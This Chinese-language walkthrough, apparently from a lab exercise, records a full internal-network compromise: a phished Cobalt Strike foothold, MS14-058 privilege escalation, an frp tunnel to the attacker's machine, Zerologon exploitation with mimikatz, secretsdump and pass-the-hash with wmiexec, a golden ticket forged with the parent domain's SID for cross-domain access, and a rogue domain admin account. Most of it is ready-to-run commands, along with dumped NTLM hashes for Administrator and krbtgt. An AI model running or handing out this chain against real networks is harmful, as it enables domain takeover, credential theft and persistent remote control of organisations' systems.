内容：
信息收集，提权，代理搭建，域横向移动，哈希传递，票据制作，跨域攻击，上线方式

渗透过程加思路：
以钓鱼形式拿下第一台外网服务器，记得设置beacon响应为实时

首先打开一个记事本准备复制粘贴要用到的数据

可以看到我们不是最高权限，第一步肯定是要进行权限提升的，先进行主机信息的收集，查看主机的系统版本，修复的补丁

本电脑为win7 可以看到收集的信息为三级域名，三个补丁

指令：

shell systeminfo

其他的先不多想，进行提权，根据版本信息和补丁，ms14_058可以提权

提权成功

拿下最高权限可以做后门权限维持，计划任务等等，这里就不多说了

最高权限也就代表这台主机是我们的了，那我们刚才看到了主机信息有三级域名，可以猜测有内网环境，我们进行网卡信息查看

指令：

shell ipconfig /all

可以看到有域环境，双网卡，DNS首选为10.10.3.6，这时候进行内网主机存活扫描，并获得上级域的计算机名和真实ip

这里用了nbtscan工具辅助扫描
查看扫描结果，主要看dc，为域控标志，这里要把计算机名字记录好，票据会用到

既然要做域横向移动那必须上传mimikatz

利用mimikatz扫一下有没有cve2020-1472漏洞

指令：

lsadump::zerologon  /target:域控IP  /account:域控主机名$

这里是存在的，因为内网和我们渗透机ip不在一个网段，是不能互通的，所以这里做下代理
我们把这两个文件上传

渗透机开启端口映射准备接收

利用cs将上传的响应启动,我们渗透机则显示连接成功

指令：

shell frpc.exe -c frp.ini

将kali的代理设置好，我们用7000端口接收碰撞，也就是在目标机上利用另一个端口连接流量


准备就绪开始利用cve进行置空域用户

指令：

shell mimikatz "lsadump::zerologon  /target:域控ip  /account:域控主机名$  /exploit" "exit"

成功后我们在kali利用secretsdump进行无密码提出散列值，将管理员和krbtgt的哈希记录

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c696e9337845d8ada46612d047e40209

指令：

proxychains impacket-secretsdump -no-pass -just-dc 域名.com/域控主机名\$@域控ip

现在可以利用wmiexec进行哈希传递登录了

指令：

proxychains python3 wmiexec.py -hashes 获得的hash ./用户名@域控ip

现在将三个文件拉出来保存在我们的本地

分别是sam，system，security

我们先利用secretsdump将文件中的散列值提出，主要为了原本的机器码

指令：

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

利用reinstall_original_pw进行还原

指令：

proxychains python3 reinstall_original_pw.py 域控主机名 域控ip 机器码hash

显示成功，我们可以直接来到虚拟机这里实验，直接登陆上来了
回到主轨，这时候我们先上线cs，直接用wmiexec哈希传递登录上传cs执行就可以了，但是要在cs这里做中转，相当于利用了外网的服务器做跳板，所以这里监听也写外网的内网网卡ip

将新生成的cs马启动

来到cs看到已经上线了

已经是最高权限了，这时候就是新的信息收集，这一部分忽略 我们知道还有父域的10.10.3.5所以我们要开始制作黄金票据了，首先上传mimikatz获取父子域的sid（就像实名制会员卡一人一张，计算机也一样）

指令：

shell mimikatz "privilege::debug" "lsadump::lsa /patch /user:administrator$" "lsadump::trust /patch" "exit"

黄金票据的几个要点我用txt列出来了

指令：

shell "kerberos::golden /user:administrator /domain:现在所在域控名.com /sid:子域控sid /sids:父域sid-519 /krbtgt:c696e9337845d8ada46612d047e40209  /ptt" "exit"

进行票据攻击，显示成功

但是响应却失败

换一种思路，将3389打开并创建新的域控用户进行远程实现黄金票据

指令：

shell net user test QWEasd123 /add /domain//创建域用户
shell net group "Domain Admin" test /add /domain//添加到域管理员组

开启3389端口远程服务

进行远程登录

登录之后进行黄金票据攻击

看到可以交互

上传cs的exe并利用PsExec.exe进行上线

运行exe文件查看cs是否上线，可以看到父域上线并且是最高权限

完成本次内网渗透